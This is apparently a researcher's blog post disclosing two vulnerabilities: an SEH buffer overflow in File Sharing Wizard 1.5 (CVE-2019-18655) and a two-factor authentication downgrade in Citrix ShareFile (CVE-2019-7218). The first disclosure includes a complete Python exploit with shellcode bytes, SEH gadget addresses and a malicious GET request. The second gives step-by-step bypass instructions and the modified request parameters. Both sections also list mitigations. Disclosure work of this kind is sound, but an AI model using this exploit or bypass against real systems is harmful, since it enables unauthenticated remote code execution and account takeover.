CVE-2019-18655: FILE SHARING WIZARD VERSION 1.5 - GET SEH BASED BUFFER OVERFLOW

After spending several hours analyzing multiple binaries for vulnerabilities, a Structured Exception Handler (SEH)-based buffer overflow vulnerability was identified in the File Sharing Wizard binary, version 1.5.0. An unauthenticated attacker is able to achieve remote code execution (RCE) by sending a specially crafted HTTP GET request containing a malicious payload in the request's URL.

This vulnerability stems from improper input validation and bounds checking in the application’s request handling routines. When the input exceeds the expected buffer size, the overflow overwrites the SEH chain, enabling arbitrary code execution.

The vulnerability resembles previously disclosed issues such as:

• CVE-2019-17415

• CVE-2019-16724

• CVE-2010-2331

In successful exploitation scenarios, attackers may gain shell access to the target system and execute arbitrary OS-level commands—without authentication.

Exploitation Steps

An attacker can exploit the vulnerability through the following steps:

1. Identify a target running File Sharing Wizard v1.5.0 and accessible via HTTP.

2. Craft a malicious URL containing a buffer overflow payload that corrupts the SEH handler.

3. Send the HTTP GET request to the target using tools like Python scripts or exploit frameworks.

4. Trigger the buffer overflow, leading to SEH chain hijacking and redirection of execution to attacker-controlled shellcode.

5. Gain remote access via a command shell or reverse shell, with the same privileges as the running application.

Following is provided a Proof of Concept (PoC) exploit:

################### PoC ################### 
#!/usr/bin/python 
import socket 
import os 
import sys 

# Bad chars: \x00\x20 # 
# SEH value: 0x9090eb08 (JMP short) # 
# NSEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)  

seh='\x6d\x57\x37\x7c' 
nseh='\x90\x90\xeb\x08' 

buf = b"" 
buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31" 
buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb" 
buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c" 
buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19" 
buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11" 
buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e" 
buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a" 
buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77" 
buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78" 
buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4" 
buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f" 
buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18" 
buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b" 
buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf" 
buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b" 
buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b" 
buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde" 

poc= 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949-len(buf)) 
payload='GET //.:/' + poc + ' HTTP/1.0\r\n\r\n' 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect(("172.16.216.135", 80)) 
s.send(payload) 
s.close 

Recommended Mitigations:

• Immediately restrict or disable access to File Sharing Wizard instances exposed to untrusted networks.

• Apply vendor patches or consider replacing the software if no fix is available.

• Implement network-based intrusion prevention systems (IPS) to detect and block exploit patterns.

• Monitor logs and network traffic for anomalous GET requests targeting the service.

Conclusion

This vulnerability in File Sharing Wizard v1.5.0 represents a severe security risk  due to its unauthenticated nature and potential for full system compromise.

Reporting Information:

CVE Identifier: CVE-2019-18655

CVSS Score: 9.8
Affected Versions: File Sharing Wizard v1.5.0

Product URL: https://file-sharing-wizard.soft112.com/

NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-18655

Reported By: Armando Huesca Prida

Tested on: 

• Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002 
• Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601 

Public Exploit (Metasploit Module): https://github.com/0xhuesca/CVE-2019-18655/blob/main/filesharing_wizard_get_bof.rb

CVE 2019-7218: CITRIX SHAREFILE TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR

Today’s post reveals a critical vulnerability affecting Citrix ShareFile versions up to and including 19.1. The application implements two-phase authentication where the OTP (One-Time Password) validation occurs independently of username/password verification. 

Citrix ShareFile Application v.19.1

Under specific conditions, an attacker who gains access to a victim’s OTP generator (physical token or virtual app like Google Authenticator) can bypass the first phase of authentication—the username and password—and gain access by submitting only a username and valid OTP.

This behavior effectively downgrades 2FA to 1FA, allowing unauthorized access without knowing the user’s password, provided the OTP device is compromised.

Deeply analyzing this vulnerability, the flaw exists in the server’s authentication flow logic, which fails to properly enforce the required sequence of authentication phases. Specifically, the server does not verify that the user has successfully completed phase 1 (username/password) before accepting and validating phase 2 (OTP).

As a result, if an attacker gains access to a user’s offline OTP token—whether physical or virtual—they can initiate a login session by submitting only the username and a valid OTP. The server mistakenly considers the OTP sufficient for authentication, thereby bypassing password validation entirely.

It is important to note that this vulnerability is only exploitable when:

• The OTP is generated offline, using a pre-configured shared secret (TOTP/HOTP).

• The server does not tie OTP validation to a prior successful username/password authentication.

• OTPs are not generated on demand and sent dynamically (e.g., via SMS or voice).

Exploitation Steps

Here is how the vulnerability can be exploited:

1. Attacker obtains access to the victim’s OTP source (Google Authenticator, physical token, etc.).

2. Intercept or recreate a login request, even with invalid or garbage values for the username and password fields.

3. Modify the request to insert the valid victim’s username and current OTP in place of the original credentials.

4. Send the modified request to the server.

5. Server validates OTP without verifying if username/password was correct—granting access.

This attack relies on the incorrect server-side assumption that OTP alone is a sufficient condition for authentication success.

Below are provided detailed requests used in order to exploit this vulnerability. In first instance, an attacker is able to intercept the log-in request with garbage data and use this request as base for the attack, changing the OTP and Password parameters

Phase 1 default log-in request and response

Request modifications:

op=webflow-verify and code=[OTP]

In case that the username/otp combination is correct (phase 2 succeeded), phase 1 authentication is bypassed and unauthorized access to the application is gained by the attacker as it is shown below:

Evil phase 2 request with modified parameters

 

The following image serves as evidence of unauthorized access to the web application by exploiting this vulnerability:

 

Unauthorized access to the application

 

Recommended Mitigations:

• Review and correct authentication logic to ensure OTP validation is only triggered after successful password verification.

• Enforce strict sequencing of authentication phases in all login flows.

• Log and alert on any login attempts where OTP is accepted without prior successful password authentication.

• Consider implementing risk-based authentication to detect and block anomalous login flows.

• Educate users on safeguarding their OTP tokens and treating them as sensitive credentials.

This issue emphasizes the importance of strong backend enforcement of authentication phases, especially in systems relying on token-based 2FA. Organizations should review their implementations immediately to ensure that OTP validation cannot occur independently of password verification. Our team is available to assist with auditing or remediation support as needed.

Conclusion

This vulnerability represents a significant break in the two-factor authentication model, where possession of an OTP device becomes the only required factor, completely bypassing password-based identity verification.

Reporting Information:

CVE Identifier: CVE-2019-7218

CVSS Score: 5.9
Affected Versions: Citrix ShareFile through 19.1

Tested on: Citrix ShareFile version 19.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-7218

Product URL: https://www.sharefile.com/

Reported by: Armando Huesca Prida, Andrea Pessione